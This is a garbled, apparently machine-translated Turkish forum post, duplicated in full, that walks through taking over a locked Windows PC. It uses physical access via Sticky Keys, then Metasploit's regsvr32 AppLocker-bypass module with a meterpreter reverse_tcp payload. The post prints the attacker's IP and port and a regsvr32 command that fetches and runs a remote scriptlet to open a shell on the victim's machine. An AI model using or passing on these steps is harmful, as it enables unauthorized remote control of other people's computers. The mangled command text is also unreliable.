Bugün bir PC'nin nasıl kilitlendiğini, ve kilitli bir ağda nasıl keşfedeceğimizi araştıracağız.
Kurbanımızın PC'sinin zaten aktif bir tuş vuruşu olduğunu varsayalım. Yapışkan tuşlar hakkında daha fazla bilgi için https://en.wikipedia.org/wiki/Sticky_keys adresini ziyaret edin.
Bu saldırı için kurbanın bilgisayarına fiziksel erişime ihtiyacın olacak. Sorunu getirmek için kurbanın bilgisayarındaki "shift" tuşuna 5 defa basın.
Sonra kendi bilgisayarımızda metasploit kullanıyoruz. $ msfconsole
Ardından, yükü bulmak, kullanmak, yüklemek, lhost, lport ve exploit çalıştırmak için
regsvr32_applocker_bypass_server kullanıyoruz.
exploit / windows / misc / regsvr32_applocker_bypass_server kullanın
yük yükleme pencereleri / metre seti / reverse_tcp
Ghost 192.168.0.106 ayarlayın
lport seti 4444
Metasploit tarafından oluşturulan komutu alın ve kurbanın bilgisayarının komut satırında çalıştırın.
Regsvr32 / s / n / u / ?: Http: //192.168.0.106:8080/nKCCncmdb.sct scrobj.dll
Voila, metrik çevirmenimizdeki kurbanın bilgisayarına gidiyoruz.
Kurbanımızın PC'sinin zaten aktif bir tuş vuruşu olduğunu varsayalım. Yapışkan tuşlar hakkında daha fazla bilgi için https://en.wikipedia.org/wiki/Sticky_keys adresini ziyaret edin.
Bu saldırı için kurbanın bilgisayarına fiziksel erişime ihtiyacın olacak. Sorunu getirmek için kurbanın bilgisayarındaki "shift" tuşuna 5 defa basın.
Sonra kendi bilgisayarımızda metasploit kullanıyoruz. $ msfconsole
Ardından, yükü bulmak, kullanmak, yüklemek, lhost, lport ve exploit çalıştırmak için
regsvr32_applocker_bypass_server kullanıyoruz.
exploit / windows / misc / regsvr32_applocker_bypass_server kullanın
yük yükleme pencereleri / metre seti / reverse_tcp
Ghost 192.168.0.106 ayarlayın
lport seti 4444
Metasploit tarafından oluşturulan komutu alın ve kurbanın bilgisayarının komut satırında çalıştırın.
Regsvr32 / s / n / u / ?: Http: //192.168.0.106:8080/nKCCncmdb.sct scrobj.dll
Voila, metrik çevirmenimizdeki kurbanın bilgisayarına gidiyoruz.
Moderatör tarafında düzenlendi:



